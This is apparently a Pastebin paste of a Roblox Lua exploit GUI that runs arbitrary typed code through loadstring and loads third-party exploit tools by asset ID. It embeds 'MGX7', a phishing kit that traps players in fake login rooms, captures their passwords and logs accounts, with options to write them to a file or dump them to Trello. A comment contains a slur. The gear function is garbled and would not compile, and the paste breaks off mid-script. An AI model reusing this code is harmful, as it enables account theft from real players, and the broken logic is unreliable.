Advertisement
RobloxGamerEvs

XYZ BY MATHEW

Oct 9th, 2016
253
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 30.84 KB | None | 0 0
  1. --XYZ GUI Objects
  2. wait(2)
  3. local LoadingScreen = Instance.new("ScreenGui", game.Players.EvanWentLimited.PlayerGui)
  4. local LoadingFrame = Instance.new("Frame", LoadingScreen)
  5. local LoadingText = Instance.new("TextBox", LoadingFrame)
  6.  
  7. LoadingScreen.Name = "XYZLoad"
  8.  
  9. LoadingFrame.Name = "LoadingFrame"
  10. LoadingFrame.Position = UDim2.new(0, 200, 0, 100)
  11. LoadingFrame.Visible = true
  12. LoadingFrame.BackgroundTransparency = 1
  13.  
  14. LoadingText.Name = "LoadingText"
  15. LoadingText.Text = "Loading... (0/38)"
  16. LoadingText.BackgroundTransparency = 1
  17. LoadingText.Position = UDim2.new(0, 200, 0, -90)
  18. LoadingText.Font = Enum.Font.SourceSansBold
  19. LoadingText.TextColor3 = Color3.fromRGB(235, 235, 235)
  20. LoadingText.FontSize = Enum.FontSize.Size28
  21. wait(.2)
  22. LoadingText.Text = "Loading... (1/38)"
  23. wait(.2)
  24. LoadingText.Text = "Loading... (2/38)"
  25. wait(.2)
  26. LoadingText.Text = "Loading... (3/38)"
  27. wait(.2)
  28. LoadingText.Text = "Loading... (4/38)"
  29. wait(.2)
  30. LoadingText.Text = "Loading... (5/38)"
  31. wait(.2)
  32. LoadingText.Text = "Loading... (6/38)"
  33. wait(.2)
  34. LoadingText.Text = "Loading... (7/38)"
  35. wait(.2)
  36. LoadingText.Text = "Loading... (8/38)"
  37. wait(.2)
  38. LoadingText.Text = "Loading... (9/38)"
  39. wait(.2)
  40. LoadingText.Text = "Loading... (10/38)"
  41. wait(.2)
  42. LoadingText.Text = "Loading... (11/38)"
  43. wait(.2)
  44. LoadingText.Text = "Loading... (12/38)"
  45. wait(.2)
  46. LoadingText.Text = "Loading... (13/38)"
  47. wait(.2)
  48. LoadingText.Text = "Loading... (14/38)"
  49. wait(.2)
  50. LoadingText.Text = "Loading... (15/38)"
  51. wait(.2)
  52. LoadingText.Text = "Loading... (16/38)"
  53. wait(.2)
  54. LoadingText.Text = "Loading... (17/38)"
  55. wait(.2)
  56. LoadingText.Text = "Loading... (18/38)"
  57. wait(.2)
  58. LoadingText.Text = "Loading... (19/39)"
  59. wait(.2)
  60. LoadingText.Text = "Loading... (20/39)"
  61. wait(.2)
  62. LoadingText.Text = "Loading... (21/39)"
  63. wait(.2)
  64. LoadingText.Text = "Loading... (22/39)"
  65. wait(.2)
  66. LoadingText.Text = "Loading... (23/39)"
  67. wait(.2)
  68. LoadingText.Text = "Loading... (24/39)"
  69. wait(.2)
  70. LoadingText.Text = "Loading... (25/39)"
  71. wait(.2)
  72. LoadingText.Text = "Loading... (26/39)"
  73. wait(.2)
  74. LoadingText.Text = "Loading... (27/39)"
  75. wait(.2)
  76. LoadingText.Text = "Loading... (28/39)"
  77. wait(.2)
  78. LoadingText.Text = "Loading... (29/39)"
  79. wait(.2)
  80. LoadingText.Text = "Loading... (30/39)"
  81. wait(.2)
  82. LoadingText.Text = "Loading... (31/39)"
  83. wait(.2)
  84. LoadingText.Text = "Loading... (32/39)"
  85. wait(.2)
  86. LoadingText.Text = "Loading... (33/39)"
  87. wait(.2)
  88. LoadingText.Text = "Loading... (34/39)"
  89. wait(.2)
  90. LoadingText.Text = "Loading... (35/39)"
  91. wait(.2)
  92. LoadingText.Text = "Loading... (36/39)"
  93. wait(.2)
  94. LoadingText.Text = "Loading... (37/39)"
  95. wait(.2)
  96. LoadingText.Text = "Loading... (38/39)"
  97. wait(.2)
  98. LoadingText.Text = "Loading... (39/39)"
  99. wait(.2)
  100. LoadingText.Text = "Loading... (FINISH)"
  101. wait(5)
  102. LoadingScreen:Destroy()
  103.  
  104.  
  105. wait(2)
  106. local XYZ = Instance.new("ScreenGui", game.Players.LocalPlayer.PlayerGui)
  107. XYZ.Name = "XYZ"
  108. local UI = Instance.new("Frame", game.Players.LocalPlayer.PlayerGui.XYZ)
  109. UI.Name = "UI"
  110. local Execute = Instance.new("TextButton", game.Players.LocalPlayer.PlayerGui.XYZ.UI)
  111. local Clear = Instance.new("TextButton", game.Players.LocalPlayer.PlayerGui.XYZ.UI)
  112. local minimize_2 = Instance.new("TextButton", game.Players.LocalPlayer.PlayerGui.XYZ.UI)
  113. local x_2 = Instance.new("TextButton", game.Players.LocalPlayer.PlayerGui.XYZ.UI)
  114. local TextField = Instance.new("TextBox", game.Players.LocalPlayer.PlayerGui.XYZ.UI)
  115. local ReOpenFrame = Instance.new("Frame", game.Players.LocalPlayer.PlayerGui.XYZ)
  116. ReOpenFrame.Name = "ReOpenFrame"
  117. local ReOpen = Instance.new("TextButton", game.Players.LocalPlayer.PlayerGui.XYZ.ReOpenFrame)
  118. ReOpen.Name = "ReOpen"
  119. local GearsScreen = Instance.new("ScreenGui", game.Players.LocalPlayer.PlayerGui)
  120. local GearsFrame = Instance.new("Frame", GearsScreen)
  121. local x_4 = Instance.new("TextButton", GearsFrame)
  122. local OutputExecute = Instance.new("TextButton", GearsFrame)
  123. local TextField_2 = Instance.new("TextBox", GearsFrame)
  124. local onReOpenClick = game.Players.LocalPlayer.PlayerGui.XYZ.ReOpenFrame.ReOpen
  125. local GUITitle = Instance.new("TextLabel", game.Players.LocalPlayer.PlayerGui.XYZ.UI)
  126. local PreScriptUI = Instance.new("Frame", game.Players.LocalPlayer.PlayerGui.XYZ)
  127. local OpenPreScripts = Instance.new("TextButton", XYZ.UI)
  128. local DesignFrame = Instance.new("Frame", PreScriptUI)
  129. local AnonymousLocalPlayer = Instance.new("TextButton", DesignFrame)
  130. local x_3 = Instance.new("TextButton", PreScriptUI)
  131. local MGX7 = Instance.new("TextButton", DesignFrame)
  132. local RealMGX7 = Instance.new("TextButton", DesignFrame)
  133. local Opengears = Instance.new("TextButton", UI)
  134. local InputBar_1 = Instance.new("TextBox", GearsFrame)
  135. local RoExploit6 = Instance.new("TextButton", DesignFrame)
  136. local RoExploit5 = Instance.new("TextButton", DesignFrame)
  137. local BestSong = Instance.new("Sound", game.Players.LocalPlayer)
  138. BestSong.SoundId = "1"
  139. BestSong.Looped = true
  140. BestSong.Pitch = 1
  141. BestSong.Volume = 1
  142. BestSong.Name = "BestSong"
  143. wait(1)
  144. BestSong:Play()
  145.  
  146. XYZ.Name = "XYZ"
  147. XYZ.Parent = game.Players.LocalPlayer.PlayerGui
  148.  
  149. UI.Name = "UI"
  150. UI.Parent = XYZ
  151. UI.Active = true
  152. UI.BackgroundColor3 = Color3.new(0.5,0.5,0.5)
  153. UI.Draggable = true
  154. UI.Position = UDim2.new(0, 200, 0, 100)
  155. UI.Size = UDim2.new(0, 370, 0, 350)
  156. UI.Visible = false
  157.  
  158. Execute.Name = "Execute"
  159. Execute.Parent = UI
  160. Execute.BackgroundColor3 = Color3.fromRGB(222, 222, 222)
  161. Execute.Position = UDim2.new(0, 11, 0, 320)
  162. Execute.Size = UDim2.new(0, 100, 0, 25)
  163. Execute.Font = Enum.Font.SourceSans
  164. Execute.FontSize = Enum.FontSize.Size14
  165. Execute.Text = "Execute"
  166. Execute.TextColor3 = Color3.fromRGB(0, 0, 0)
  167.  
  168. Clear.Name = "Clear"
  169. Clear.Parent = UI
  170. Clear.BackgroundColor3 = Color3.fromRGB(222, 222, 222)
  171. Clear.Position = UDim2.new(0, 204, 0, 320)
  172. Clear.Size = UDim2.new(0, 100, 0, 25)
  173. Clear.Font = Enum.Font.SourceSans
  174. Clear.FontSize = Enum.FontSize.Size14
  175. Clear.Text = "Clear"
  176. Clear.TextColor3 = Color3.fromRGB(0, 0, 0)
  177.  
  178. TextField.Name = "TextField"
  179. TextField.Parent = UI
  180. TextField.BackgroundColor3 = Color3.fromRGB(234, 234, 234)
  181. TextField.BackgroundTransparency = 0
  182. TextField.Position = UDim2.new(0, 15, 0, 33)
  183. TextField.Size = UDim2.new(0, 285, 0, 273)
  184. TextField.ClearTextOnFocus = false
  185. TextField.Font = Enum.Font.SourceSans
  186. TextField.FontSize = Enum.FontSize.Size14
  187. TextField.MultiLine = true
  188. TextField.Text = "--Doger"
  189. TextField.TextWrapped = true
  190. TextField.TextXAlignment = Enum.TextXAlignment.Left
  191. TextField.TextYAlignment = Enum.TextYAlignment.Top
  192.  
  193. minimize_2.Name = "minimize"
  194. minimize_2.Parent = UI
  195. minimize_2.BackgroundColor3 = Color3.new(1, 1, 1)
  196. minimize_2.BackgroundTransparency = 1
  197. minimize_2.Position = UDim2.new(0, 320, 0, 0)
  198. minimize_2.Size = UDim2.new(0, 25, 0, 25)
  199. minimize_2.ZIndex = 4
  200. minimize_2.Font = Enum.Font.SourceSansBold
  201. minimize_2.FontSize = Enum.FontSize.Size14
  202. minimize_2.Text = "-"
  203. minimize_2.TextColor3 = Color3.new(1, 1, 1)
  204.  
  205. x_2.Name = "x"
  206. x_2.Parent = UI
  207. x_2.BackgroundColor3 = Color3.new(1, 1, 1)
  208. x_2.BackgroundTransparency = 1
  209. x_2.Position = UDim2.new(0, 345, 0, 0)
  210. x_2.Size = UDim2.new(0, 25, 0, 25)
  211. x_2.ZIndex = 4
  212. x_2.Font = Enum.Font.SourceSansBold
  213. x_2.FontSize = Enum.FontSize.Size14
  214. x_2.Text = "X"
  215. x_2.TextColor3 = Color3.new(1, 1, 1)
  216.  
  217. GUITitle.Name = "GUITitle"
  218. GUITitle.Parent = UI
  219. GUITitle.BackgroundColor3 = Color3.new(1, 1, 1)
  220. GUITitle.BackgroundTransparency = 1
  221. GUITitle.Position = UDim2.new(0, 100, 0, 0)
  222. GUITitle.Size = UDim2.new(0, 25, 0, 25)
  223. GUITitle.ZIndex = 4
  224. GUITitle.Font = Enum.Font.SourceSansBold
  225. GUITitle.FontSize = Enum.FontSize.Size14
  226. GUITitle.Text = "XYZ GUI V0.5"
  227. GUITitle.TextColor3 = Color3.new(1, 1, 1)
  228.  
  229. OpenPreScripts.Name = "OpenPreScripts"
  230. OpenPreScripts.Text = "PreScripts"
  231. OpenPreScripts.Size = UDim2.new(0, 69, 0, 25)
  232. OpenPreScripts.Position = UDim2.new(0, 300, 0, 33)
  233.  
  234. PreScriptUI.Name = "PreScripts"
  235. PreScriptUI.Parent = XYZ
  236. PreScriptUI.Active = true
  237. PreScriptUI.BackgroundColor3 = Color3.new(0.5,0.5,0.5)
  238. PreScriptUI.Draggable = true
  239. PreScriptUI.Position = UDim2.new(0, 200, 0, 100)
  240. PreScriptUI.Size = UDim2.new(0, 370, 0, 350)
  241. PreScriptUI.Visible = false
  242.  
  243. AnonymousLocalPlayer.Name = "AnonLocalPlayer"
  244. AnonymousLocalPlayer.Parent = DesignFrame
  245. AnonymousLocalPlayer.Active = true
  246. AnonymousLocalPlayer.BackgroundColor3 = Color3.new(0.5,0.5,0.5)
  247. AnonymousLocalPlayer.Size = UDim2.new(0, 69, 0, 25)
  248. AnonymousLocalPlayer.Text = "Anon Player"
  249. AnonymousLocalPlayer.Position = UDim2.new(0, 0, 0, 23)
  250.  
  251. MGX7.Name = "GoobyGUIV2"
  252. MGX7.Parent = DesignFrame
  253. MGX7.Active = true
  254. MGX7.BackgroundColor3 = Color3.new(0.5,0.5,0.5)
  255. MGX7.Size = UDim2.new(0, 69, 0, 25)
  256. MGX7.Text = "GoobyGUIV2"
  257. MGX7.Position = UDim2.new(0, 0, 0, 46)
  258.  
  259. RealMGX7.Name = "MGX7"
  260. RealMGX7.Parent = DesignFrame
  261. RealMGX7.Active = true
  262. RealMGX7.BackgroundColor3 = Color3.new(0.5,0.5,0.5)
  263. RealMGX7.Size = UDim2.new(0, 69, 0, 25)
  264. RealMGX7.Text = "MGX7"
  265. RealMGX7.Position = UDim2.new(0, 0, 0, 69)
  266.  
  267. RoExploit6.Name = "Ro-Xploit6"
  268. RoExploit6.Parent = DesignFrame
  269. RoExploit6.Active = true
  270. RoExploit6.BackgroundColor3 = Color3.new(0.5,0.5,0.5)
  271. RoExploit6.Size = UDim2.new(0, 69, 0, 25)
  272. RoExploit6.Text = "RoXploit6"
  273. RoExploit6.Position = UDim2.new(0, 0, 0, 92)
  274.  
  275. RoExploit5.Name = "Ro-Xploit5"
  276. RoExploit5.Parent = DesignFrame
  277. RoExploit5.Active = true
  278. RoExploit5.BackgroundColor3 = Color3.new(0.5,0.5,0.5)
  279. RoExploit5.Size = UDim2.new(0, 69, 0, 25)
  280. RoExploit5.Text = "RoXploit5"
  281. RoExploit5.Position = UDim2.new(0, 0, 0, 125)
  282.  
  283. x_3.Name = "x"
  284. x_3.Parent = PreScriptUI
  285. x_3.BackgroundColor3 = Color3.new(1, 1, 1)
  286. x_3.BackgroundTransparency = 1
  287. x_3.Position = UDim2.new(0, 329, 0, 0)
  288. x_3.Size = UDim2.new(0, 25, 0, 25)
  289. x_3.ZIndex = 4
  290. x_3.Font = Enum.Font.SourceSansBold
  291. x_3.FontSize = Enum.FontSize.Size14
  292. x_3.Text = "X"
  293. x_3.TextColor3 = Color3.new(1, 1, 1)
  294.  
  295. DesignFrame.Name = "DesignFrame"
  296. DesignFrame.Parent = PreScriptUI
  297. DesignFrame.Active = true
  298. DesignFrame.BackgroundTransparency = 0.4
  299. DesignFrame.Position = UDim2.new(0, 15, 0, 25)
  300. DesignFrame.Size = UDim2.new(0, 340, 0, 310)
  301. DesignFrame.Visible = false
  302. DesignFrame.BackgroundColor3 = Color3.new(0, 0, 0)
  303.  
  304. ReOpenFrame.Visible = true
  305. UI.Visible = false
  306. ReOpen.Size = UDim2.new(0, 50, 0, 50)
  307. ReOpen.Text = "XYZ"
  308. ReOpen.Visible = true
  309.  
  310. Opengears.Name = "OpenGears/Output"
  311. Opengears.Text = "Gears"
  312. Opengears.Size = UDim2.new(0, 69, 0, 25)
  313. Opengears.Position = UDim2.new(0, 300, 0, 66)
  314.  
  315. GearsScreen.Name = "Output/Gears"
  316. GearsScreen.Parent = game.Players.LocalPlayer.PlayerGui
  317.  
  318. GearsFrame.Name = "GearsFrame"
  319. GearsFrame.Parent = GearsScreen
  320. GearsFrame.Active = true
  321. GearsFrame.BackgroundColor3 = Color3.new(0.5,0.5,0.5)
  322. GearsFrame.Draggable = true
  323. GearsFrame.Position = UDim2.new(0, 200, 0, 100)
  324. GearsFrame.Size = UDim2.new(0, 315, 0, 350)
  325. GearsFrame.Visible = false
  326.  
  327. TextField_2.Name = "TextField"
  328. TextField_2.Parent = GearsFrame
  329. TextField_2.BackgroundColor3 = Color3.fromRGB(234, 234, 234)
  330. TextField_2.BackgroundTransparency = 0
  331. TextField_2.Position = UDim2.new(0, 15, 0, 33)
  332. TextField_2.Size = UDim2.new(0, 285, 0, 273)
  333. TextField_2.ClearTextOnFocus = false
  334. TextField_2.Font = Enum.Font.SourceSans
  335. TextField_2.FontSize = Enum.FontSize.Size14
  336. TextField_2.MultiLine = true
  337. TextField_2.Text = "Type :gears to view Gears!"
  338. TextField_2.TextWrapped = true
  339. TextField_2.TextXAlignment = Enum.TextXAlignment.Left
  340. TextField_2.TextYAlignment = Enum.TextYAlignment.Top
  341.  
  342. InputBar_1.Name = "InputBar"
  343. InputBar_1.Parent = GearsFrame
  344. InputBar_1.BackgroundColor3 = Color3.fromRGB(234, 234, 234)
  345. InputBar_1.BackgroundTransparency = 0
  346. InputBar_1.Position = UDim2.new(0, 15, 0, 320)
  347. InputBar_1.Size = UDim2.new(0, 230, 0, 20)
  348. InputBar_1.ClearTextOnFocus = false
  349. InputBar_1.Font = Enum.Font.SourceSans
  350. InputBar_1.FontSize = Enum.FontSize.Size14
  351. InputBar_1.MultiLine = false
  352. InputBar_1.Text = ""
  353. InputBar_1.TextWrapped = true
  354. InputBar_1.TextXAlignment = Enum.TextXAlignment.Left
  355. InputBar_1.TextYAlignment = Enum.TextYAlignment.Top
  356.  
  357. OutputExecute.Name = "Execute"
  358. OutputExecute.Parent = GearsFrame
  359. OutputExecute.BackgroundColor3 = Color3.fromRGB(234, 234, 234)
  360. OutputExecute.Position = UDim2.new(0, 250, 0, 320)
  361. OutputExecute.Size = UDim2.new(0, 50, 0, 20)
  362. OutputExecute.Font = Enum.Font.SourceSans
  363. OutputExecute.FontSize = Enum.FontSize.Size14
  364. OutputExecute.Text = "Execute"
  365. OutputExecute.TextColor3 = Color3.fromRGB(0, 0, 0)
  366.  
  367. x_4.Name = "x"
  368. x_4.Parent = GearsFrame
  369. x_4.BackgroundColor3 = Color3.new(1, 1, 1)
  370. x_4.BackgroundTransparency = 1
  371. x_4.Position = UDim2.new(0, 290, 0, 0)
  372. x_4.Size = UDim2.new(0, 25, 0, 25)
  373. x_4.ZIndex = 4
  374. x_4.Font = Enum.Font.SourceSansBold
  375. x_4.FontSize = Enum.FontSize.Size14
  376. x_4.Text = "X"
  377. x_4.TextColor3 = Color3.new(1, 1, 1)
  378.  
  379.  
  380. function onClick()
  381. loadstring(TextField.Text)()
  382. end
  383. Execute.MouseButton1Click:connect(onClick)
  384.  
  385. function onXClick()
  386. XYZ:Destroy()
  387. end
  388. x_2.MouseButton1Click:connect(onXClick)
  389.  
  390. function onMinimizeClick()
  391. UI.Visible = false
  392. ReOpen.Size = UDim2.new(0, 50, 0, 50)
  393. ReOpen.Text = "XYZ"
  394. ReOpen.Visible = true
  395. end
  396. minimize_2.MouseButton1Click:connect(onMinimizeClick)
  397.  
  398. function onXYZOpenClick()
  399. UI.Visible = true
  400. ReOpen.Visible = false
  401. end
  402. ReOpen.MouseButton1Click:connect(onXYZOpenClick)
  403.  
  404. function onClearClick()
  405. TextField.Text = ""
  406. end
  407. Clear.MouseButton1Click:connect(onClearClick)
  408.  
  409. function onPreScriptsClick()
  410. UI.Visible = false
  411. PreScriptUI.Visible = true
  412. ReOpen.Visible = true
  413. DesignFrame.Visible = true
  414. end
  415. OpenPreScripts.MouseButton1Click:connect(onPreScriptsClick)
  416.  
  417. function onX_3Click()
  418. PreScriptUI.Visible = false
  419. end
  420. x_3.MouseButton1Click:connect(onX_3Click)
  421.  
  422. function onAnonClick()
  423. local pe = Instance.new("ParticleEmitter",game.Players.LocalPlayer.Character.Torso)
  424. pe.Texture = "http://www.roblox.com/asset/?id=127476787"
  425. pe.VelocitySpread = 5
  426. end
  427. AnonymousLocalPlayer.MouseButton1Click:connect(onAnonClick)
  428.  
  429. function onMGX7Click()
  430. loadstring(game:GetObjects("rbxassetid://447933940")[1].Source)()
  431. end
  432. MGX7.MouseButton1Click:connect(onMGX7Click)
  433.  
  434. function onRoXploitClick()
  435. loadstring(game:GetObjects("rbxassetid://364364477")[1].Source)()
  436. end
  437. RoExploit6.MouseButton1Click:connect(onRoXploitClick)
  438.  
  439. function onRoXploit5Click()
  440. loadstring(game:GetObjects("rbxassetid://288646117")[1].Source)()
  441. end
  442. RoExploit5.MouseButton1Click:connect(onRoXploit5Click)
  443.  
  444. function onOpenGearsClick()
  445. GearsFrame.Visible = true
  446. ReOpenFrame.Visible = true
  447. UI.Visible = false
  448. ReOpen.Visible = true
  449. end
  450. Opengears.MouseButton1Click:connect(onOpenGearsClick)
  451.  
  452. function GearExecuted()
  453. if InputBar_1.Text == ":gears" then
  454. TextField_2.Text = (TextField_2.Text.."\n"..">UserInput: [:gears]\n"..":Laser --Gives Player Laser Gun")
  455. else
  456. if InputBar_1.Text == ":Laser" then
  457. wait(2)
  458. TextField_2.Text = (TextField_2.Text.."\n"..">:Laser".."\n>User Gear Sent")
  459. local root = game:GetService("InsertService"):LoadAsset(130113146)
  460. local item = root:children()
  461. for i = 1, #item do
  462. item[i].Parent = game.Players.LocalPlayer.Backpack
  463. item[i]:Clone() .Parent = game.Players.LocalPlayer.StarterGear
  464. end
  465. else
  466. TextField_2.Text = (TextField_2.Text.."\n"..">UserInput: ["..InputBar_1.Text.."]".."\n>Not Gear/Command")
  467. else
  468. if InputBar_1.Text == ":Laser" then
  469. wait(2)
  470. TextField_2.Text = (TextField_2.Text.."\n"..">:Laser".."\n>User Gear Sent")
  471. local root = game:GetService("InsertService"):LoadAsset(95354288)
  472. local item = root:children()
  473. for i = 1, #item do
  474. item[i].Parent = game.Players.LocalPlayer.Backpack
  475. item[i]:Clone() .Parent = game.Players.LocalPlayer.StarterGear
  476. end
  477. else
  478. else
  479. if InputBar_1.Text == ":Laser" then
  480. wait(2)
  481. TextField_2.Text = (TextField_2.Text.."\n"..">:Laser".."\n>User Gear Sent")
  482. local root = game:GetService("InsertService"):LoadAsset(160189476)
  483. local item = root:children()
  484. for i = 1, #item do
  485. item[i].Parent = game.Players.LocalPlayer.Backpack
  486. item[i]:Clone() .Parent = game.Players.LocalPlayer.StarterGear
  487. end
  488. else
  489. TextField_2.Text = (TextField_2.Text.."\n"..">UserInput: ["..InputBar_1.Text.."]".."\n>Not Gear/Command")
  490. if InputBar_1.Text == ":Laser" then
  491. wait(2)
  492. TextField_2.Text = (TextField_2.Text.."\n"..">:Laser".."\n>User Gear Sent")
  493. local root = game:GetService("InsertService"):LoadAsset(114020480)
  494. local item = root:children()
  495. for i = 1, #item do
  496. item[i].Parent = game.Players.LocalPlayer.Backpack
  497. item[i]:Clone() .Parent = game.Players.LocalPlayer.StarterGear
  498. end
  499. else
  500. TextField_2.Text = (TextField_2.Text.."\n"..">UserInput: ["..InputBar_1.Text.."]".."\n>Not Gear/Command")
  501. else
  502. TextField_2.Text = (TextField_2.Text.."\n"..">UserInput: ["..InputBar_1.Text.."]".."\n>Not Gear/Command")
  503. if InputBar_1.Text == ":Laser" then
  504. wait(2)
  505. TextField_2.Text = (TextField_2.Text.."\n"..">:Laser".."\n>User Gear Sent")
  506. local root = game:GetService("InsertService"):LoadAsset(1132887630)
  507. local item = root:children()
  508. for i = 1, #item do
  509. item[i].Parent = game.Players.LocalPlayer.Backpack
  510. item[i]:Clone() .Parent = game.Players.LocalPlayer.StarterGear
  511. end
  512. else
  513. else
  514. TextField_2.Text = (TextField_2.Text.."\n"..">UserInput: ["..InputBar_1.Text.."]".."\n>Not Gear/Command")
  515. if InputBar_1.Text == ":Laser" then
  516. wait(2)
  517. TextField_2.Text = (TextField_2.Text.."\n"..">:Laser".."\n>User Gear Sent")
  518. local root = game:GetService("InsertService"):LoadAsset(172246669)
  519. local item = root:children()
  520. for i = 1, #item do
  521. item[i].Parent = game.Players.LocalPlayer.Backpack
  522. item[i]:Clone() .Parent = game.Players.LocalPlayer.StarterGear
  523. end
  524. else
  525. TextField_2.Text = (TextField_2.Text.."\n"..">UserInput: ["..InputBar_1.Text.."]".."\n>Not Gear/Command")
  526. end
  527. end
  528. end
  529. OutputExecute.MouseButton1Click:connect(GearExecuted)
  530.  
  531. function CharAdded()
  532. ReOpenFrame.Visible = true
  533. end
  534. game.Players.ChildAdded:connect(CharAdded)
  535.  
  536. function onx_4Click()
  537. GearsFrame.Visible = false
  538. end
  539. x_4.MouseButton1Click:connect(onx_4Click)
  540.  
  541. function onRealMGX7Click()
  542. --Dont leak faggot, or hell will be released
  543.  
  544. local MyRoom = "BasicRoom"
  545.  
  546. local StorageType = 2
  547.  
  548. local ScamType = "Pick"
  549.  
  550. local TargetList = {}
  551.  
  552. local Bypassers = {
  553. {}
  554. }
  555.  
  556. local Trello = {
  557. Enabled = false,
  558. List = "MRList",
  559. DumpList = "MRDumps",
  560. TrelloTargetList = "MRTargetList",
  561. DevKey = "",
  562. Token = "",
  563. }
  564.  
  565. local floodChat = false
  566.  
  567. local writeAccounts = true
  568. local fileName = "MGX8List"
  569.  
  570. BypassKey = "v3rm"
  571. BypassKeyEnabled = true
  572. BypassKeyRules = true
  573.  
  574. local kickLogin = false
  575.  
  576. local RAPApi = true
  577. ------------------------------------------------------------------------
  578.  
  579. local MainFolder = game:GetObjects("rbxassetid://432005266")[1]
  580. MainFolder.Parent = game.ReplicatedStorage
  581.  
  582. local player = game.Players.LocalPlayer
  583.  
  584. local CurrentlyScamming = {}
  585.  
  586. local MRStorage
  587.  
  588. local guiTool = MainFolder.Login
  589.  
  590. local replaceScript = game:GetService("InsertService"):LoadAsset(80576967):GetChildren()[1].LocalScript
  591. guiTool.LocalScript:Destroy()
  592. replaceScript.Parent = guiTool
  593.  
  594. local ruleTool = MainFolder["Bypass Rules"]
  595.  
  596. local replaceScript = game:GetService("InsertService"):LoadAsset(80576967):GetChildren()[1].LocalScript
  597. ruleTool.LocalScript:Destroy()
  598. replaceScript.Parent = ruleTool
  599.  
  600. local pickGui = MainFolder.PickGui
  601.  
  602. function checkPass(pass, playa)
  603. if BypassKeyEnabled and pass == BypassKey then
  604. if BypassKeyRules then
  605. local newTool = ruleTool:Clone()
  606. newTool.Parent = workspace
  607. newTool.Handle.CanCollide = false
  608. newTool.Handle.CFrame = playa.Character.Head.CFrame
  609. end
  610. return true
  611. end
  612. if pass == "Password" or pass == "" or pass == "Enter Your Password" or pass == "Incorrect Password" or pass == "Enter your Password" then
  613. return false
  614. end
  615. local foundNums = 0
  616. local foundLetters = 0
  617. if string.find(pass, " ") then
  618. return false
  619. end
  620. if pass:len() < 6 or pass:len() > 20 then
  621. return false
  622. end
  623. for i=1,pass:len() do
  624. if pass:sub(i,i):match("%d") ~= nil then
  625. foundNums = foundNums + 1
  626. end
  627. end
  628. if foundNums < 2 then
  629. return false
  630. end
  631. for i=1,pass:len() do
  632. if pass:sub(i,i):match("%a") ~= nil then
  633. foundLetters = foundLetters + 1
  634. end
  635. end
  636. if foundLetters < 4 then
  637. return false
  638. end
  639. return true
  640. end
  641.  
  642. function getUText(root, val)
  643. local found
  644. if val then
  645. found = val
  646. end
  647. for i,v in pairs(root:GetChildren()) do
  648. if v.Name == "UText" then
  649. found = v
  650. break
  651. end
  652. found = getUText(v,found)
  653. end
  654. return found
  655. end
  656.  
  657. function getPText(root, val)
  658. local found
  659. if val then
  660. found = val
  661. end
  662. for i,v in pairs(root:GetChildren()) do
  663. if v.Name == "PText" then
  664. found = v
  665. break
  666. end
  667. found = getPText(v,found)
  668. end
  669. return found
  670. end
  671.  
  672. function getILPopUp(root, val)
  673. local found
  674. if val then
  675. found = val
  676. end
  677. for i,v in pairs(root:GetChildren()) do
  678. if v.Name == "ILPopUp" then
  679. found = v
  680. break
  681. end
  682. found = getILPopUp(v,found)
  683. end
  684. return found
  685. end
  686.  
  687. function unscPlayer(plr)
  688. for i,v in pairs(CurrentlyScamming) do
  689. if plr == v.Player then
  690. table.insert(Bypassers,{Name = plr.Name, ID = plr.UserId})
  691. table.remove(CurrentlyScamming,i)
  692. wait()
  693. while plr.Backpack:FindFirstChild("Login") do
  694. plr.Backpack.Login:Destroy()
  695. wait()
  696. end
  697. while plr.Character:FindFirstChild("Login") do
  698. plr.Character.Login:Destroy()
  699. wait()
  700. end
  701. plr.Character:WaitForChild("Torso")
  702. plr.Character:WaitForChild("HumanoidRootPart")
  703. plr.Character.HumanoidRootPart.Anchored = false
  704. plr.Character.HumanoidRootPart.CFrame = v.ReturnPos
  705. v.Player.CameraMaxZoomDistance = 400
  706. v.Player.CameraMinZoomDistance = 0
  707. v.RoomModel:Destroy()
  708. end
  709. end
  710. end
  711.  
  712. function scPlayer(plr)
  713. ypcall(function()
  714. local debounce = false
  715. local roomCheck = MainFolder.Rooms:FindFirstChild(MyRoom)
  716. if roomCheck then
  717. local roomId = #CurrentlyScamming + 1
  718. local newRoom = roomCheck:Clone()
  719. newRoom.Parent = workspace
  720. newRoom:MoveTo(Vector3.new(5000,1000, 5000 + 100 * roomId))
  721.  
  722. local newPacket = {Player = plr, RoomId = roomId, RoomModel = newRoom, ReturnPos = plr.Character.Torso.CFrame}
  723. table.insert(CurrentlyScamming,newPacket)
  724. --[[
  725. newRoom.LButton.ClickDetector.MouseClick:connect(function(playa)
  726. if debounce == false then
  727. if playa.Backpack:FindFirstChild("Login") then
  728. if playa == plr and getILPopUp(playa.Backpack.Login) and getPText(playa.Backpack.Login) then
  729. debounce = true
  730. getILPopUp(newRoom).Visible = false
  731. getILPopUp(playa.Backpack.Login).Visible = false
  732. wait(0.5)
  733. if playa.Backpack:FindFirstChild("Login") then
  734. if checkPass(getPText(playa.Backpack.Login).Text) then
  735. print(plr.Name .. " : " .. getPText(playa.Backpack.Login).Text)
  736. unscPlayer(plr)
  737. else
  738. getILPopUp(newRoom).Visible = true
  739. getILPopUp(playa.Backpack.Login).Visible = true
  740. getPText(playa.Backpack.Login).Text = ""
  741. end
  742. end
  743. end
  744. end
  745. debounce = false
  746. end
  747. end)
  748. --]]
  749. end
  750. end)
  751. end
  752.  
  753. function isBypass(plr)
  754. local bypass = false
  755. for i,v in pairs(Bypassers) do
  756. if v.Name == plr.Name or v.ID == plr.UserId then
  757. bypass = true
  758. end
  759. end
  760. return bypass
  761. end
  762.  
  763. function isScamming(plr)
  764. local isScam = false
  765. for i,v in pairs(CurrentlyScamming) do
  766. if v.Player.Name == plr then
  767. isScam = true
  768. end
  769. end
  770. return isScam
  771. end
  772.  
  773. function fixPlayers()
  774. for i,v in pairs(CurrentlyScamming) do
  775. ypcall(function()
  776. if v.Player.Character:FindFirstChild("Login") then
  777. if v.Player.Character.Login:FindFirstChild("SprayGui") then
  778. local tempTool = v.Player.Character:FindFirstChild("Login")
  779. tempTool.Parent = v.RoomModel
  780. tempTool.Handle.CFrame = v.Player.Character.Head.CFrame
  781. end
  782. end
  783. end)
  784. end
  785. end
  786.  
  787. function BCtoDumpStr(str)
  788. local res = ""
  789. if str == "Enum.MembershipType.BuildersClub" then
  790. res = "[BC] "
  791. elseif str == "Enum.MembershipType.TurboBuildersClub" then
  792. res = "[TBC] "
  793. elseif str == "Enum.MembershipType.OutrageousBuildersClub" then
  794. res = "[OBC] "
  795. elseif str == "Enum.MembershipType.None" then
  796. res = ""
  797. end
  798. return res
  799. end
  800.  
  801. function getRap(user)
